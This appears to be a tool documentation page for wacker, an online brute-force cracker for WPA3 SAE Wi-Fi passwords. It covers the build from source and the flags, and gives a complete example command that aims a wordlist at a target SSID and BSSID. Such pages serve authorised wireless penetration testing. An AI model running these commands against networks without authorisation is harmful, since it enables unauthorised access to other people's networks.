Skip to main content

Overview

WPA3 SAE (Simultaneous Authentication of Equals) is resistant to offline dictionary attacks, no crackable handshake is exposed. wacker performs online brute force by attempting each password from a wordlist against the live AP, one connection attempt at a time. Slow by nature (network-rate limited), but the only option against pure WPA3 networks with no WPA2 fallback.

Install

wacker has no requirements.txt — it needs a patched wpa_supplicant 2.10 built from source:
git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker
sudo apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
cp defconfig wpa_supplicant-2.10/wpa_supplicant/.config
git apply wpa_supplicant.patch
cd wpa_supplicant-2.10/wpa_supplicant && make -j4

Usage

./wacker.py [options]

Common Flags

FlagDescription
--wordlist <file>Password wordlist
--ssid <SSID>Target network SSID
--bssid <MAC>Target AP MAC address
--interface <iface>Wireless interface (managed mode)
--freq <MHz>AP operating frequency

Example

cd ~/tools/wacker
./wacker.py \
  --wordlist ~/rockyou-top100000.txt \
  --ssid <TARGET-SSID> \
  --bssid <BSSID> \
  --interface wlan1 \
  --freq 2462
Common frequencies: 2412 (ch1), 2437 (ch6), 2462 (ch11), 5180 (ch36), 5200 (ch40).